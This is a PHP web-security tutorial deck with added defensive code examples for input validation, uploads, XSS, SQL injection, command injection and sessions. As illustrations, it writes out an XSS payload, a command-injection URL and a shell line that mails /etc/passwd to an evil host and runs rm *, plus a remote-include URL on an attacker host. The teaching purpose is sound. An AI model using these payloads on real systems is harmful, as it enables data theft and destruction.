PHP Security
What is Security?
measurement…
safety…
protection…
Secure Web Applications
Web security issues have to do with:
– hacker attacks
  • denial of service
  • server hijacking
– common threats
– compromise of data
PHP & Security
a growing language…
a major concern…
Never trust the web…
• Input data validation
  – register_globals = OFF (the directive was removed in PHP 5.4; on older installs it let request parameters initialise arbitrary PHP variables)
  – $_REQUEST[] is a big NO NO … read $_GET, $_POST or $_COOKIE explicitly; $_REQUEST merges them in the order set by request_order, so a cookie can shadow a query parameter
  – type cast input data
    • do not rely on is_numeric() for numeric data: it accepts forms such as "1e3" and leading whitespace [locale problem]; cast to int or validate with filter_var() and FILTER_VALIDATE_INT
    • use an anchored, allow-list regular expression if data is a string
  – Path validation
    • always use basename() (and strip backslashes first, since on *nix basename() only treats "/" as a separator)
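The checks above, as an added example that is not from the slides: three typed validators for a request, written for PHP 8. The parameter names, value ranges and the regular expressions are assumptions for illustration.

```php
<?php
// Added example, not from the slides. Assumes PHP 8 and a request such as
//   /user.php?id=42&name=alice&file=report.doc
// Reads $_GET explicitly: $_REQUEST merges GET/POST/COOKIE in an order set
// by php.ini (request_order), so a cookie could shadow a query parameter.

function input_int(array $src, string $key, int $min = 1, int $max = PHP_INT_MAX): ?int
{
    // FILTER_VALIDATE_INT rejects "42abc", "42.0", "4e1" and "0x2A", and
    // returns false for a missing value or an array (?id[]=1). A bare (int)
    // cast would turn "42abc" into 42 and "abc" into 0 without complaint.
    $v = filter_var($src[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

function input_username(array $src, string $key): ?string
{
    $v = $src[$key] ?? null;
    // Allow-list pattern anchored with \A and \z: a trailing "$" would still
    // accept "alice\n", because "$" matches before a final newline.
    if (!is_string($v) || preg_match('/\A[a-z0-9_]{3,32}\z/', $v) !== 1) {
        return null;
    }
    return $v;
}

function input_filename(array $src, string $key): ?string
{
    $v = $src[$key] ?? null;
    if (!is_string($v) || str_contains($v, "\0")) {
        return null;   // a NUL byte would truncate the path in the C library
    }
    // basename() drops directory components, but on Unix it only treats "/" as
    // a separator, so normalise backslashes first and refuse ".." outright.
    $name = basename(str_replace('\\', '/', $v));
    if ($name === '' || str_contains($name, '..')) {
        return null;
    }
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/', $name) === 1 ? $name : null;
}

$id   = input_int($_GET, 'id');
$name = input_username($_GET, 'name');
$file = input_filename($_GET, 'file');
if ($id === null || $name === null || $file === null) {
    http_response_code(400);
    exit('bad request');
}
// From here on $id is an int and $name / $file match known-safe shapes.
```

Each validator returns null on any doubt rather than a "cleaned" value, so the handler fails closed; the regular expressions are allow-lists and would be adjusted per field.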
Never trust the web…
• Content size validation
  – use server-side max length validation (a maxlength attribute on the form is client-side and trivially bypassed)
• File upload
  – check the destination file size with $_FILES['name']['size'] (this is measured by PHP, unlike the Content-Length the browser sends)
  – I think the browser MIME header is reliable, right? It is not: $_FILES['name']['type'] is whatever the client chose to send
  – use getimagesize() on the temporary file in the case of an image
• External source upload, such as an avatar
  – make a local copy if a path/of/file is submitted as a URL, then validate that copy exactly like a direct upload
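The upload checks from this slide, as an added example that is not the slides' code: size enforced server-side, the browser MIME type ignored in favour of getimagesize(), a generated file name, and the same validation path reused for an avatar fetched from a URL. The field name, directory, size limit and the private-range policy on remote fetches are assumptions.

```php
<?php
// Added example, not from the slides. Assumes PHP 8, a form field named
// "avatar", and an upload directory outside the document root.

const UPLOAD_DIR = '/var/www/uploads';   // assumed; must not be served as PHP
const MAX_BYTES  = 512 * 1024;           // server-side limit, independent of the form
const IMAGE_EXT  = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];

// Checks that apply to any local file we are about to keep, whether it
// arrived through $_FILES or was downloaded from a URL.
function validate_image_file(string $path): string
{
    if (filesize($path) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // getimagesize() parses the actual bytes; the browser-supplied MIME type in
    // $_FILES[...]['type'] and the client's file extension are both untrusted.
    $info = @getimagesize($path);
    if ($info === false || !isset(IMAGE_EXT[$info[2]])) {
        throw new RuntimeException('not a supported image');
    }
    return IMAGE_EXT[$info[2]];   // extension we assign; the client's name is discarded
}

function store(string $tmp, string $ext, bool $isUpload): string
{
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // move_uploaded_file() refuses anything that is not a genuine upload of
    // this request, which also defeats a forged $_FILES entry.
    $ok = $isUpload ? move_uploaded_file($tmp, $dest) : rename($tmp, $dest);
    if (!$ok) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

function handle_avatar_upload(array $f): string
{
    if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . ($f['error'] ?? '?'));
    }
    // $_FILES['avatar']['size'] is measured by PHP, so it is safe to compare;
    // validate_image_file() re-checks on disk anyway.
    if ($f['size'] > MAX_BYTES || !is_uploaded_file($f['tmp_name'])) {
        throw new RuntimeException('rejected upload');
    }
    return store($f['tmp_name'], validate_image_file($f['tmp_name']), true);
}

// "External source upload": copy to a local temp file, then run the same checks.
function fetch_avatar_from_url(string $url): string
{
    $p = parse_url($url);
    if (!is_array($p) || !in_array($p['scheme'] ?? '', ['http', 'https'], true) || empty($p['host'])) {
        throw new RuntimeException('only http(s) URLs are accepted');
    }
    // Assumed policy: refuse hosts that resolve to private or loopback ranges so
    // the fetch cannot be aimed at internal services (coarse: the stream does its
    // own lookup later, so a host that changes its answer can still slip past).
    $ip = gethostbyname($p['host']);
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        throw new RuntimeException('host not allowed');
    }
    $ctx  = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    // Read at most MAX_BYTES + 1 so an oversized body is detected without buffering it all.
    $data = file_get_contents($url, false, $ctx, 0, MAX_BYTES + 1);
    if ($data === false || strlen($data) > MAX_BYTES) {
        throw new RuntimeException('download failed or too large');
    }
    $tmp = tempnam(sys_get_temp_dir(), 'avatar');
    file_put_contents($tmp, $data);
    try {
        return store($tmp, validate_image_file($tmp), false);
    } finally {
        @unlink($tmp);   // no-op if rename() already moved it
    }
}

// Usage from a handler (constructed):
//   $path = isset($_FILES['avatar'])
//       ? handle_avatar_upload($_FILES['avatar'])
//       : fetch_avatar_from_url($_POST['avatar_url'] ?? '');
```

The stored name is random with a fixed extension taken from the detected image type, so neither the original file name nor the client's MIME type influences what ends up on disk.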
XSS attack
– Can lead to embarrassment.
– Session take-over.
– Password theft.
– User tracking by 3rd parties.
XSS attack
Prevention is better than cure
– Use strip_tags()
  • no tag allowance please (call it without an allowed-tags argument)
– Use htmlentities() (or htmlspecialchars() with ENT_QUOTES) on every value you echo, including what strip_tags() left behind
– Is $_SERVER safe? No; parts of it echo the request:
  • PATH_INFO and PHP_SELF can be set by the URL
  • request: php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
  • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo
  • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
  • so echoing $_SERVER['PHP_SELF'] into a form action without escaping is an XSS
– IP-based info
  • HTTP_X_FORWARDED_FOR is set by the client or by intermediate proxies; only trust it when REMOTE_ADDR is your own proxy, and take the entry that proxy appended
  • normalise with long2ip(ip2long()) (or filter_var() with FILTER_VALIDATE_IP, which also handles IPv6 and rejects junk instead of yielding 0.0.0.0)
  – $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
  – $sValidIp = long2ip(ip2long(trim(array_pop($aIp))));
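Both halves of this slide in one added example that is not the slides' code: an escaping helper applied to the PHP_SELF case and to strip_tags() output, plus a client-IP routine that only honours X-Forwarded-For when the request came through a known proxy. The proxy address and the field names are assumptions.

```php
<?php
// Added example, not from the slides. Assumes PHP 8 and that the app sits
// behind one reverse proxy whose address is listed in TRUSTED_PROXIES.

// One escaping helper for everything echoed into HTML. ENT_QUOTES also escapes
// the single quote, which matters inside attribute values; this is the
// htmlspecialchars() form of the slide's htmlentities() advice.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The slide's request /php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
// gives $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
// Unescaped:  <form action="/php.php/"><script>alert('xss')</script><foo">   (script runs)
// Escaped:    <form action="/php.php/&quot;&gt;&lt;script&gt;...">            (inert text)
function form_action(): string
{
    // SCRIPT_NAME is the script path without the attacker-supplied PATH_INFO;
    // escape it anyway, since every $_SERVER value that echoes the request is untrusted.
    return e($_SERVER['SCRIPT_NAME'] ?? '/');
}

// "No tag allowance": strip_tags() with no allowed tags, then escape what is
// left, because strip_tags() removes tags but leaves quotes and stray "<" behind.
function comment_html(string $raw): string
{
    return nl2br(e(strip_tags($raw)));
}

const TRUSTED_PROXIES = ['10.0.0.5'];   // assumed address of the reverse proxy

function client_ip(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    // The header only means something if the TCP peer is our proxy; otherwise a
    // client can send "X-Forwarded-For: 1.2.3.4" and pick its own "IP".
    if (!in_array($remote, TRUSTED_PROXIES, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // Proxies append to the list ("client, proxy1, proxy2"), so the rightmost
    // entries are the trustworthy ones: drop our own proxies from the right and
    // the next entry is what the proxy saw as the client.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    while ($hops !== [] && in_array(end($hops), TRUSTED_PROXIES, true)) {
        array_pop($hops);
    }
    $candidate = array_pop($hops);
    // Validate rather than long2ip(ip2long()): ip2long() gives false for junk,
    // which long2ip() turns into "0.0.0.0", and it cannot represent IPv6.
    $ok = $candidate === null ? false : filter_var($candidate, FILTER_VALIDATE_IP);
    return $ok === false ? $remote : $ok;
}

// Constructed request: the client injected "1.2.3.4", the proxy appended the
// real peer address, and REMOTE_ADDR is the proxy itself, so the injected
// first entry is ignored.
$srv = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '1.2.3.4, 203.0.113.9'];
$ip  = client_ip($srv);
```

If there is no proxy at all, TRUSTED_PROXIES is empty and client_ip() simply returns REMOTE_ADDR, which is the only value the client cannot forge.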
SQL Injection
– Arbitrary query execution.
– Removal of data.
– Modification of existing values.
– Denial of service.
– Arbitrary data injection.
Preventing SQL injection
• Are magic quotes enough? No (and magic_quotes_gpc was removed in PHP 5.4):
  – use mysql_real_escape_string() (today mysqli_real_escape_string(); the mysql_* extension was removed in PHP 7)
  – use prepared statements: the value never becomes part of the SQL text
  – avoid omitting single quotes: escaping only helps inside a quoted literal; WHERE id = $id with an unquoted value is injectable however well it is escaped
  – the LIKE quandary: quoting is not enough, the wildcard characters % and _ must be escaped as well
  – avoid printing the query (or the database error) to the user; log it instead
  – Authentication data storage
    • encrypt sensitive data used to access the database
    • make sure it is only loaded for a certain VirtualHost
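The prevention points above, as an added example that is not from the slides: PDO prepared statements for the unquoted-integer case, an explicit ESCAPE character for LIKE, and errors kept in the log rather than the response. The DSN, credentials and table layout are placeholders.

```php
<?php
// Added example, not from the slides. Assumes PDO with the mysql driver and a
// table users(id INT, name VARCHAR, email VARCHAR); DSN/credentials are placeholders.

function db(): PDO
{
    return new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'app', 'secret', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,   // real server-side prepares
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// "Avoid omitting single quotes": escaping cannot rescue this, because the
// value is not inside a quoted literal to begin with (constructed, vulnerable):
//   $sql = "SELECT * FROM users WHERE id = " . mysqli_real_escape_string($db, $_GET['id']);
//   ?id=1 OR 1=1   ->   SELECT * FROM users WHERE id = 1 OR 1=1     (no quote needed)
// With a bound parameter the value can only ever be an integer:
function find_user(PDO $pdo, int $id): ?array
{
    $st = $pdo->prepare('SELECT id, name, email FROM users WHERE id = :id');
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    return $st->fetch() ?: null;
}

// The LIKE quandary: binding stops injection, but % and _ are still wildcards
// inside the pattern, so a term of "%" would match every row and "a_" every
// two-letter name starting with a. Escape them with an explicit ESCAPE char.
function escape_like(string $s, string $esc = '!'): string
{
    return str_replace([$esc, '%', '_'], [$esc . $esc, $esc . '%', $esc . '_'], $s);
}

function search_users(PDO $pdo, string $term): array
{
    $st = $pdo->prepare("SELECT id, name FROM users WHERE name LIKE :pat ESCAPE '!' LIMIT 50");
    $st->execute([':pat' => '%' . escape_like($term) . '%']);
    return $st->fetchAll();
}

// "Avoid printing the query": catch PDOException at the boundary and log it;
// the client only gets a generic status.
function search_endpoint(string $term): array
{
    try {
        return search_users(db(), $term);
    } catch (PDOException $e) {
        error_log('search failed: ' . $e->getMessage());   // SQL text and driver error stay in the log
        http_response_code(500);
        return [];
    }
}
```

With ATTR_EMULATE_PREPARES off the driver sends the statement and the parameters separately, so the quoting question disappears for ordinary values; LIKE patterns are the one place where the application still has to escape, and that is wildcard escaping, not quote escaping.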
Authentication Data Storage
/home/illa/sql.conf (Apache server configuration):
  SetEnv DB_LOGIN "login"
  SetEnv DB_PASSWD "password"
  SetEnv DB_HOST "127.0.0.7"

The VirtualHost that pulls it in:
  <VirtualHost illa.ws>
      Include /home/illa/sql.conf
  </VirtualHost>

PHP file:
  $_SERVER['DB_LOGIN']
  $_SERVER['DB_PASSWD']

A better approach is to set these things under PHP's ini directives with php_admin_value, e.g. php_admin_value mysql.default_user "login" (the directive is mysql.default_user, not mysql.default.user; for mysqli it is mysqli.default_user). A SetEnv value shows up in $_SERVER and in phpinfo() output, whereas a php_admin_value setting cannot be overridden from ini_set() or .htaccess.
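The two approaches side by side, as an added configuration example that is not the slide's own config. Hostname, paths and credentials are placeholders; it assumes mod_php (with PHP-FPM the same settings go in the pool file as php_admin_value[mysqli.default_user] and friends).

```apache
# Added example, not the slide's configuration. Placeholders throughout.

# --- /home/illa/sql.conf : outside DocumentRoot, mode 0600, owned by root.
# Apache reads it once at startup while still running as root.

# Weak: SetEnv exports the secret into $_SERVER and phpinfo() for every
# script on this vhost, and it is easy to copy into another vhost by mistake.
#   SetEnv DB_LOGIN  "login"
#   SetEnv DB_PASSWD "password"

# Better: php_admin_value makes these the PHP ini defaults for this vhost only;
# ini_set() and .htaccess cannot override them, and a mysqli connection opened
# with no arguments ($db = new mysqli();) picks them up, so no PHP file in the
# source tree has to contain the password.
php_admin_value mysqli.default_host "127.0.0.1"
php_admin_value mysqli.default_user "illa_app"
php_admin_value mysqli.default_pw   "change-me"

# --- /etc/apache2/sites-available/illa.conf
<VirtualHost *:443>
    ServerName   illa.ws
    DocumentRoot /home/illa/public
    # Only this vhost includes the credentials file.
    Include /home/illa/sql.conf
</VirtualHost>
```

Code running inside this vhost can still read the values through ini_get(), so this keeps the password out of the source tree and away from other vhosts rather than hiding it from the application itself. The legacy mysql extension used mysql.default_user and mysql.default_password for the same purpose.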
Preventing code injection
– Path validation
– Validate fileName
  $sFile = "D\\'sozaRes.doc";   // the string D\'sozaRes.doc
  basename($sFile); // returns D\'sozaRes.doc on a *nix system (only "/" is a separator there)
  basename($sFile); // returns 'sozaRes.doc on win32 (both "\" and "/" are separators)
  • remove slashes of both kinds before calling basename()
  • keep a white list of file names
  • use the full path, and check that the resolved path is still under the intended directory
– Avoid variables in eval()
– Avoid using variables passed by users in a regEx (quote them with preg_quote() if unavoidable)
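The four points on this slide in one added example that is not the slides' code: basename() with the backslash case handled, a realpath() containment check, an allow-list for include paths, preg_quote() for user terms, and a dispatch table in place of eval(). The document directory, page map and operator names are assumptions.

```php
<?php
// Added example, not from the slides. Assumes PHP 8 and that user-selectable
// documents live under DOC_ROOT (path is a placeholder).

const DOC_ROOT = '/var/www/docs';

function safe_doc_path(string $requested): ?string
{
    if (str_contains($requested, "\0")) {
        return null;   // a NUL byte would truncate the path inside the C library
    }
    // The slide's point: on *nix basename() only knows "/", so D\'sozaRes.doc
    // comes back unchanged. Normalise backslashes first; the allow-list regex
    // then rejects the quote and anything else outside a plain file name.
    $name = basename(str_replace('\\', '/', $requested));
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/', $name)) {
        return null;
    }
    // "Use full path": resolve and confirm the file is still under DOC_ROOT,
    // which also catches a symlink inside DOC_ROOT that points elsewhere.
    $root = realpath(DOC_ROOT);
    $full = realpath(DOC_ROOT . '/' . $name);
    if ($root === false || $full === false || !str_starts_with($full, $root . '/')) {
        return null;
    }
    return $full;
}

// "Keep a white list": for include/require never build the path from input;
// map a short key to a known file instead. This removes ?page=../../etc/passwd
// and, with allow_url_include on, ?page=http://attacker.example/shell.txt as well.
const PAGES = ['home' => 'home.php', 'about' => 'about.php'];

function page_file(string $key): string
{
    return __DIR__ . '/pages/' . (PAGES[$key] ?? PAGES['home']);
}

// "Avoid variables passed by users in a regex": preg_quote() turns every
// metacharacter into a literal, so "(a+)+$" becomes a plain search string
// instead of a pattern that can backtrack catastrophically or fail to compile.
function search_pattern(string $term): string
{
    return '/' . preg_quote($term, '/') . '/iu';
}

// "Avoid variables in eval()": there is no escaping function for PHP code.
// If user input must choose behaviour, dispatch through a fixed table instead.
function apply_op(string $op, int $a, int $b): int
{
    $ops = [
        'add' => fn(int $x, int $y): int => $x + $y,
        'sub' => fn(int $x, int $y): int => $x - $y,
    ];
    if (!isset($ops[$op])) {
        throw new InvalidArgumentException('unknown op');
    }
    return $ops[$op]($a, $b);
}
```

Note that realpath() returns false for a file that does not exist, so safe_doc_path() doubles as an existence check; for a path that will be created, resolve the directory instead and append the validated name afterwards.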
Command injection
– Use escapeshellcmd() for a whole command string and escapeshellarg() for each individual argument (escapeshellcmd() alone still lets a user add extra arguments)
– Use the full path for the command
– Set priority and memory limit for the command
  • shell_exec("ulimit -t 20 -m 20000; /usr/bin/php test.php");
  (ulimit -t is CPU seconds; -m sets the resident-set limit, which Linux does not enforce, so use -v for address space there)
Calling External Programs
<?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>
The user could control $to to yield:
http://examp.com/send.php?to=evil%40evil.org+%3C+%2Fetc%2Fpasswd%3B+rm+%2A
which would result in running the command:
/usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
(sendmail gets /etc/passwd on stdin, then rm * runs in the web server's working directory)
A solution would be:
$fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
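The sendmail case hardened a step further, plus the resource-limited helper from the previous slide, as an added example that is not the slides' code: validate the recipient before quoting it, and build argv per argument instead of one command string. Paths and the job script name are assumptions.

```php
<?php
// Added example, not from the slides. Assumes PHP 8 (array form of proc_open)
// and that /usr/sbin/sendmail and /bin/bash exist at those paths.

function open_sendmail(string $to)
{
    // Validate the shape first. escapeshellarg() stops the shell from acting on
    // "<", ";" and "*", but a recipient beginning with "-" would still be read
    // by sendmail as an option, so that is refused here as well.
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false || $to[0] === '-') {
        throw new InvalidArgumentException('bad recipient');
    }
    // Full path (no PATH lookup); "--" ends option parsing in getopt-based
    // sendmail implementations; escapeshellarg() single-quotes the value.
    $fp = popen('/usr/sbin/sendmail -i -- ' . escapeshellarg($to), 'w');
    if ($fp === false) {
        throw new RuntimeException('popen failed');
    }
    return $fp;
}
// For the slide's payload, $to = "evil@evil.org < /etc/passwd; rm *" (constructed):
//   unescaped, the shell line is   /usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
//   escapeshellarg() would give    /usr/sbin/sendmail -i -- 'evil@evil.org < /etc/passwd; rm *'
//   and FILTER_VALIDATE_EMAIL rejects the value before popen() is reached anyway.

// "Set priority and memory limit for command", without building the command
// from strings. -t is CPU seconds; -v (address space, KiB) is used instead of
// the slide's -m, which Linux does not enforce.
function run_limited(array $argv, int $cpuSeconds = 20, int $memKiB = 200000): array
{
    // Each argument is quoted separately: escapeshellcmd() is meant for a whole
    // command string and still lets an attacker append extra arguments.
    $quoted = implode(' ', array_map('escapeshellarg', $argv));
    $script = sprintf('ulimit -t %d -v %d && exec %s', $cpuSeconds, $memKiB, $quoted);
    $spec   = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc   = proc_open(['/bin/bash', '-c', $script], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return ['status' => proc_close($proc), 'stdout' => $out, 'stderr' => $err];
}

// Usage (constructed): the user-supplied value is one argv entry, never shell text.
// $result = run_limited(['/usr/bin/php', '/srv/jobs/test.php', $_GET['job'] ?? '']);
```

Both functions keep the trust boundary in the same place: user data is validated, then passed as a single quoted argument, and the program path is absolute so PATH manipulation cannot swap the binary.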
Securing sessions
• Weakness of session
  – Server-side weakness…
    • ls -l /tmp/sess_* // the default session.save_path is the shared /tmp: any local user can list live session IDs from the file names, and any script running as the same web-server user (another vhost, say) can read their contents
  – URL session exploitation (a session ID in the query string leaks through Referer headers, logs and bookmarks, and makes fixation trivial)
• Solution
  – Native protection: session.use_only_cookies = 1, session.use_trans_sid = 0, session.use_strict_mode = 1, HttpOnly and Secure cookie flags, session_regenerate_id() after login
  – Mixing security and convenience.
  – Securing the session storage path: a per-application session.save_path not readable by other users
  – Check browser signature
  – Referrer validation
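The solution list on this slide as an added example that is not the slides' code: a session bootstrap that moves storage out of /tmp, disables URL session IDs, sets the cookie flags, binds the session to the browser signature, and a Referer check for state-changing requests. The save path and host name are assumptions.

```php
<?php
// Added example, not from the slides. Assumes PHP 8, HTTPS, and a session
// directory created for this application alone (path is a placeholder).

function secure_session_start(): void
{
    // Server-side weakness: the default save_path is the shared /tmp, where
    // "ls -l /tmp/sess_*" lists live session IDs and any script running as the
    // same web-server user can read the files. Use a private 0700 directory.
    ini_set('session.save_path', '/var/lib/php/sessions/illa');

    // URL session exploitation: never read or emit the ID from the query string,
    // and refuse IDs this server did not issue (session fixation).
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1');

    // Native protection on the cookie: HttpOnly keeps it out of document.cookie
    // (the XSS slide's "session take-over"), Secure keeps it off plain HTTP.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();

    // "Check browser signature": bind the session to the User-Agent. The header
    // is attacker-controlled, so this only raises the bar for a stolen ID; it
    // does not replace the cookie flags above.
    $sig = hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
    if (isset($_SESSION['ua_sig']) && !hash_equals($_SESSION['ua_sig'], $sig)) {
        session_unset();                 // drop the data
        session_regenerate_id(true);     // and retire the old ID
    }
    $_SESSION['ua_sig'] = $sig;
}

// Privilege change: issue a fresh ID so an ID planted before login is worthless.
function mark_logged_in(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['uid'] = $userId;
}

// "Referrer validation" for state-changing requests. Referer is often stripped
// by browsers or privacy tools, so treat it as one signal, not the only one.
function referer_matches(array $server, string $expectedHost): bool
{
    $host = parse_url($server['HTTP_REFERER'] ?? '', PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Usage (constructed):
// secure_session_start();
// if ($_SERVER['REQUEST_METHOD'] === 'POST' && !referer_matches($_SERVER, 'illa.ws')) {
//     http_response_code(403);
//     exit;
// }
```

With use_strict_mode on, an unknown session ID presented by the client is discarded and a fresh one issued, which is what makes the URL-based fixation case on this slide stop working even if an attacker manages to plant a cookie.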
Questions…????
Thank You !!